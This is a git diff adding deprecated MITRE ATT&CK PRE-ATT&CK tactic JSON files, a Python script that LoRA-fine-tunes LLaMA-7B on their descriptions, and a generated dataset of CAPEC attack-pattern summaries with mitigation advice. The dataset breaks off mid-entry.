"x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Priority Definition Planning", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0012/).\n\nPriority definition planning consists of the process of determining the set of Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) required for meeting key strategic, operational, or tactical goals. Leadership outlines the priority definition (may be considered a goal) around which the adversary designs target selection and a plan to achieve. An analyst may outline the priority definition when in the course of determining gaps in existing KITs or KIQs.", + "external_references": [ + { + "external_id": "TA0012", + "url": "https://attack.mitre.org/tactics/TA0012", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "priority-definition-planning", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:31:37.810Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24.json new file mode 100644 index 0000000000000000000000000000000000000000..ac29d6b7d410492e0566bbf4e12d9decbc6e2572 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--20798ee1-0b3b-4ed2-b482-9593e61514da", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Organizational Information Gathering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0017/).\n\nOrganizational information gathering consists of the process of identifying critical organizational elements of intelligence an adversary will need about a target in order to best attack.\u00a0 Similar to competitive intelligence, organizational intelligence gathering focuses on understanding the operational tempo of an organization and gathering a deep understanding of the organization and how it operates, in order to best develop a strategy to target it.", + "external_references": [ + { + "external_id": "TA0017", + "url": "https://attack.mitre.org/tactics/TA0017", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "organizational-information-gathering", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:34:54.996Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2.json new file mode 100644 index 0000000000000000000000000000000000000000..3cbf6aec91b50be8eb5faedd4d79db54d8f483fa --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--f05d626c-1639-44e8-9352-f66fac74afbc", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test Capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0025/).\n\nTesting capabilities takes place when adversaries may need to test capabilities externally to refine development goals and criteria and to ensure success during an operation. Certain testing may be done after a capability is staged.", + "external_references": [ + { + "external_id": "TA0025", + "url": "https://attack.mitre.org/tactics/TA0025", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "test-capabilities", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:38:29.580Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b.json new file mode 100644 index 0000000000000000000000000000000000000000..96f2a575b3bbdf535a60f11248c96190baca9b48 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--6cc98a65-3516-48c4-82b8-0f0f21bf5ff4", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Organizational Weakness Identification", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0020/).\n\nOrganizational weakness identification consists of identifying and analyzing weaknesses and vulnerabilities from the intelligence gathering phases which can be leveraged to gain access to target or intermediate target organizations of interest.", + "external_references": [ + { + "external_id": "TA0020", + "url": "https://attack.mitre.org/tactics/TA0020", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "organizational-weakness-identification", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:36:16.863Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e.json new file mode 100644 index 0000000000000000000000000000000000000000..5dbf205983a50d21ccc2bd4924961567817c5614 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--e685313a-1616-4c87-977f-210b9342452a", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Persona Development", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0023/).\n\nPersona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.", + "external_references": [ + { + "external_id": "TA0023", + "url": "https://attack.mitre.org/tactics/TA0023", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "persona-development", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:37:42.444Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266.json new file mode 100644 index 0000000000000000000000000000000000000000..e6feae6862db3e3a1b298c82e5df58802e1b743e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--49f23383-84a2-4f8e-97b9-ee6d91e611fb", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build Capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0024/).\n\nBuilding capabilities consists of developing and/or acquiring the software, data and techniques used at different phases of an operation. This is the process of identifying development requirements and implementing solutions such as malware, delivery mechanisms, obfuscation/cryptographic protections, and call back and O&M functions.", + "external_references": [ + { + "external_id": "TA0024", + "url": "https://attack.mitre.org/tactics/TA0024", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "build-capabilities", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:38:02.517Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607.json new file mode 100644 index 0000000000000000000000000000000000000000..31d0f564a030ba60e740fd1600f3c54e832f1b15 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--ff08b219-32a0-46c0-9668-b50473234545", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Stage Capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0026/).\n\nStaging capabilities consists of preparing operational environment required to conduct the operation. This includes activities such as deploying software, uploading data, enabling command and control infrastructure.", + "external_references": [ + { + "external_id": "TA0026", + "url": "https://attack.mitre.org/tactics/TA0026", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "stage-capabilities", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:38:57.122Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb.json new file mode 100644 index 0000000000000000000000000000000000000000..152e3476744e5bb8ccb1c1944b76c71cf7746fe3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--4cd040f0-6307-4145-ad8d-784daf1b8735", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "People Information Gathering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0016/).\n\nPeople Information Gathering consists of the process of identifying critical personnel elements of intelligence an adversary will need about a target in order to best attack.\u00a0 People intelligence gathering focuses on identifying key personnel or individuals with critical accesses in order to best approach a target for attack.\u00a0 It may involve aspects of social engineering, elicitation, mining social media sources, or be thought of as understanding the personnel element of competitive intelligence.", + "external_references": [ + { + "external_id": "TA0016", + "url": "https://attack.mitre.org/tactics/TA0016", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "people-information-gathering", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:34:26.736Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b.json new file mode 100644 index 0000000000000000000000000000000000000000..c24beede36e123443a47175a4b14af37e0da974b --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--c6452ab5-5581-42c0-b059-da38dfccdb10", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "People Weakness Identification", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0019/).\n\nPeople weakness identification consists of identifying and analyzing weaknesses and vulnerabilities from the intelligence gathering phases which can be leveraged to gain access to target or intermediate target persons of interest or social trust relationships.", + "external_references": [ + { + "external_id": "TA0019", + "url": "https://attack.mitre.org/tactics/TA0019", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "people-weakness-identification", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:35:52.355Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/main.py b/main.py new file mode 100644 index 0000000000000000000000000000000000000000..4be52a80d5885469e10852c8c6a113968bd97092 --- /dev/null +++ b/main.py @@ -0,0 +1,234 @@ +import json +import transformers +import textwrap +from transformers import LlamaTokenizer, LlamaForCausalLM +import os +import sys +from typing import List + +from peft import ( + LoraConfig, + get_peft_model, + get_peft_model_state_dict, + prepare_model_for_int8_training, +) + +import fire +import torch +from datasets import load_dataset +import pandas as pd + +import matplotlib.pyplot as plt +import matplotlib as mpl +import seaborn as sns +from pylab import rcParams + +sns.set(rc={'figure.figsize': (10, 7)}) +sns.set(rc={'figure.dpi': 100}) +sns.set(style='white', palette='muted', font_scale=1.2) + +DEVICE = "cuda" if torch.cuda.is_available() else "cpu" +print(DEVICE) + + +def find_files(directory): + file_list = [] + for root, dirs, files in os.walk(directory): + for file in files: + file_path = os.path.join(root, file) + file_list.append(file_path) + return file_list + + +def load_all_mitre_dataset(filepath): + res = [] + for file in find_files(filepath): + # print(file) + if file.endswith(".json"): + # filename = os.path.join(filepath, file) + data = json.load(open(file)) + for object_data in data["objects"]: + if "name" in object_data: + # print(object_data["name"]) + res.append(object_data) + return res + + +loaded_data = load_all_mitre_dataset("./cti-ATT-CK-v13.1") +print("[+] ALL FILES: ", len(loaded_data)) +# print(loaded_data[0]) + + +""" + { + "instruction": "What is", + "input": "field definition", + "output": "field ) + } +""" + + +def formal_dataset(loaded_data): + res = [] + print(loaded_data[0]) + for data in loaded_data: + try: + # print(object_data["name"]) + res.append({ + "instruction": "What is", + "input": data["name"], + "output": data["description"] + }) + except: + pass + # print(len(res)) + return res + + +dataset_data = formal_dataset(loaded_data) +print("[+] DATASET LEN: ", len(dataset_data)) +print(dataset_data[0]) + +with open("mitre-dataset.json", "w") as f: + json.dump(dataset_data, f) + + +BASE_MODEL = "decapoda-research/llama-7b-hf" + +model = LlamaForCausalLM.from_pretrained( + BASE_MODEL, + load_in_8bit=True, + torch_dtype=torch.float16, + device_map="auto", +) + +tokenizer = LlamaTokenizer.from_pretrained(BASE_MODEL) + +tokenizer.pad_token_id = ( + 0 # unk. we want this to be different from the eos token +) +tokenizer.padding_side = "left" + +data = load_dataset("json", data_files="mitre-dataset.json") +print(data["train"]) + + +def generate_prompt(data_point): + return f"""Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request. # noqa: E501 +### Instruction: +{data_point["instruction"]} +### Input: +{data_point["input"]} +### Response: +{data_point["output"]}""" + + +CUTOFF_LEN = 256 + + +def tokenize(prompt, add_eos_token=True): + result = tokenizer( + prompt, + truncation=True, + max_length=CUTOFF_LEN, + padding=False, + return_tensors=None, + ) + if ( + result["input_ids"][-1] != tokenizer.eos_token_id + and len(result["input_ids"]) < CUTOFF_LEN + and add_eos_token + ): + result["input_ids"].append(tokenizer.eos_token_id) + result["attention_mask"].append(1) + + result["labels"] = result["input_ids"].copy() + + return result + + +def generate_and_tokenize_prompt(data_point): + full_prompt = generate_prompt(data_point) + tokenized_full_prompt = tokenize(full_prompt) + return tokenized_full_prompt + + +train_val = data["train"].train_test_split( + test_size=200, shuffle=True, seed=42 +) +train_data = ( + train_val["train"].map(generate_and_tokenize_prompt) +) +val_data = ( + train_val["test"].map(generate_and_tokenize_prompt) +) + +LORA_R = 8 +LORA_ALPHA = 16 +LORA_DROPOUT = 0.05 +LORA_TARGET_MODULES = [ + "q_proj", + "v_proj", +] + +BATCH_SIZE = 128 +MICRO_BATCH_SIZE = 4 +GRADIENT_ACCUMULATION_STEPS = BATCH_SIZE // MICRO_BATCH_SIZE +LEARNING_RATE = 3e-4 +TRAIN_STEPS = 300 +OUTPUT_DIR = "experiments" + +model = prepare_model_for_int8_training(model) +config = LoraConfig( + r=LORA_R, + lora_alpha=LORA_ALPHA, + target_modules=LORA_TARGET_MODULES, + lora_dropout=LORA_DROPOUT, + bias="none", + task_type="CAUSAL_LM", +) +model = get_peft_model(model, config) +model.print_trainable_parameters() + +training_arguments = transformers.TrainingArguments( + per_device_train_batch_size=MICRO_BATCH_SIZE, + gradient_accumulation_steps=GRADIENT_ACCUMULATION_STEPS, + warmup_steps=100, + max_steps=TRAIN_STEPS, + learning_rate=LEARNING_RATE, + fp16=True, + logging_steps=10, + optim="adamw_torch", + evaluation_strategy="steps", + save_strategy="steps", + eval_steps=50, + save_steps=50, + output_dir=OUTPUT_DIR, + save_total_limit=3, + load_best_model_at_end=True, + report_to="tensorboard" +) + +data_collator = transformers.DataCollatorForSeq2Seq( + tokenizer, pad_to_multiple_of=8, return_tensors="pt", padding=True +) + +trainer = transformers.Trainer( + model=model, + train_dataset=train_data, + eval_dataset=val_data, + args=training_arguments, + data_collator=data_collator +) +model.config.use_cache = False +old_state_dict = model.state_dict +model.state_dict = ( + lambda self, *_, **__: get_peft_model_state_dict( + self, old_state_dict() + ) +).__get__(model, type(model)) + +model = torch.compile(model) + +trainer.train() +model.save_pretrained(OUTPUT_DIR) diff --git a/mitre-dataset.json b/mitre-dataset.json new file mode 100644 index 0000000000000000000000000000000000000000..bb2f8f35bb1621470950e59284545b25519d2008 --- /dev/null +++ b/mitre-dataset.json @@ -0,0 +1 @@ +[{"instruction": "What is", "input": "Accessing Functionality Not Properly Constrained by ACLs", "output": "In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to."}, {"instruction": "What is", "input": "coa-1-0", "output": "\n In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as \"NoAccess\", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.\n Having done so, any direct access to those protected Servlets will be prohibited by the web container.\n In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic.\n "}, {"instruction": "What is", "input": "Buffer Overflow via Environment Variables", "output": "This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the adversary finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables."}, {"instruction": "What is", "input": "coa-10-0", "output": "Do not expose environment variable to the user."}, {"instruction": "What is", "input": "coa-10-1", "output": "Do not use untrusted data in your environment variables."}, {"instruction": "What is", "input": "coa-10-2", "output": "Use a language or compiler that performs automatic bounds checking"}, {"instruction": "What is", "input": "coa-10-3", "output": "There are tools such as Sharefuzz [REF-2] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow."}, {"instruction": "What is", "input": "Overflow Buffers", "output": "Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an adversary. As a consequence, an adversary is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the adversaries' choice."}, {"instruction": "What is", "input": "coa-100-0", "output": "Use a language or compiler that performs automatic bounds checking."}, {"instruction": "What is", "input": "coa-100-1", "output": "Use secure functions not vulnerable to buffer overflow."}, {"instruction": "What is", "input": "coa-100-2", "output": "If you have to use dangerous functions, make sure that you do boundary checking."}, {"instruction": "What is", "input": "coa-100-3", "output": "Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution."}, {"instruction": "What is", "input": "coa-100-4", "output": "Use OS-level preventative functionality. Not a complete solution."}, {"instruction": "What is", "input": "coa-100-5", "output": "Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the software."}, {"instruction": "What is", "input": "Server Side Include (SSI) Injection", "output": "An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands."}, {"instruction": "What is", "input": "coa-101-0", "output": "Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them"}, {"instruction": "What is", "input": "coa-101-1", "output": "All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive"}, {"instruction": "What is", "input": "coa-101-2", "output": "Server Side Includes must be enabled only if there is a strong business reason to do so. Every additional component enabled on the web server increases the attack surface as well as administrative overhead"}, {"instruction": "What is", "input": "Session Sidejacking", "output": "Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token."}, {"instruction": "What is", "input": "coa-102-0", "output": "Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel."}, {"instruction": "What is", "input": "coa-102-1", "output": "Modify the session token with each transmission and protect it with cryptography. Add the idea of request sequencing that gives the server an ability to detect replay attacks."}, {"instruction": "What is", "input": "Clickjacking", "output": "An adversary tricks a victim into unknowingly initiating some action in one system while interacting with the UI from a seemingly completely different, usually an adversary controlled or intended, system."}, {"instruction": "What is", "input": "coa-103-0", "output": "If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames."}, {"instruction": "What is", "input": "coa-103-1", "output": "Turn off JavaScript, Flash and disable CSS."}, {"instruction": "What is", "input": "coa-103-2", "output": "When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks."}, {"instruction": "What is", "input": "Cross Zone Scripting", "output": "An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security."}, {"instruction": "What is", "input": "coa-104-0", "output": "Disable script execution."}, {"instruction": "What is", "input": "coa-104-1", "output": "Ensure that sufficient input validation is performed for any potentially untrusted data before it is used in any privileged context or zone"}, {"instruction": "What is", "input": "coa-104-2", "output": "Limit the flow of untrusted data into the privileged areas of the system that run in the higher trust zone"}, {"instruction": "What is", "input": "coa-104-3", "output": "Limit the sites that are being added to the local machine zone and restrict the privileges of the code running in that zone to the bare minimum"}, {"instruction": "What is", "input": "coa-104-4", "output": "Ensure proper HTML output encoding before writing user supplied data to the page"}, {"instruction": "What is", "input": "HTTP Request Splitting", "output": "\n An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to split a single HTTP request into multiple unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).\n See CanPrecede relationships for possible consequences.\n "}, {"instruction": "What is", "input": "coa-105-0", "output": "Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies."}, {"instruction": "What is", "input": "coa-105-1", "output": "Configuration: front-end HTTP agents notice ambiguous requests."}, {"instruction": "What is", "input": "coa-105-2", "output": "Configuration: back-end HTTP agents reject ambiguous requests and close the network connection."}, {"instruction": "What is", "input": "coa-105-3", "output": "Configuration: Disable reuse of back-end connections."}, {"instruction": "What is", "input": "coa-105-4", "output": "Configuration: Use HTTP/2 for back-end connections."}, {"instruction": "What is", "input": "coa-105-5", "output": "Configuration: Use the same web server software for front-end and back-end server."}, {"instruction": "What is", "input": "coa-105-6", "output": "Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses."}, {"instruction": "What is", "input": "coa-105-7", "output": "Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)"}, {"instruction": "What is", "input": "coa-105-8", "output": "Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process."}, {"instruction": "What is", "input": "coa-105-9", "output": "Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input."}, {"instruction": "What is", "input": "DEPRECATED: XSS through Log Files", "output": "This attack pattern has been deprecated as it referes to an existing chain relationship between \"CAPEC-93 : Log Injection-Tampering-Forging\" and \"CAPEC-63 : Cross-Site Scripting\". Please refer to these CAPECs going forward."}, {"instruction": "What is", "input": "Cross Site Tracing", "output": "Cross Site Tracing (XST) enables an adversary to steal the victim's session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim's browser communicates to a destination system's web server."}, {"instruction": "What is", "input": "coa-107-0", "output": "Administrators should disable support for HTTP TRACE at the destination's web server. Vendors should disable TRACE by default."}, {"instruction": "What is", "input": "coa-107-1", "output": "Patch web browser against known security origin policy bypass exploits."}, {"instruction": "What is", "input": "Command Line Execution through SQL Injection", "output": "An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host."}, {"instruction": "What is", "input": "coa-108-0", "output": "Disable MSSQL xp_cmdshell directive on the database"}, {"instruction": "What is", "input": "coa-108-1", "output": "Properly validate the data (syntactically and semantically) before writing it to the database."}, {"instruction": "What is", "input": "coa-108-2", "output": "Do not implicitly trust the data stored in the database. Re-validate it prior to usage to make sure that it is safe to use in a given context (e.g. as a command line argument)."}, {"instruction": "What is", "input": "Object Relational Mapping Injection", "output": "An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject their own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible."}, {"instruction": "What is", "input": "coa-109-0", "output": "Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a 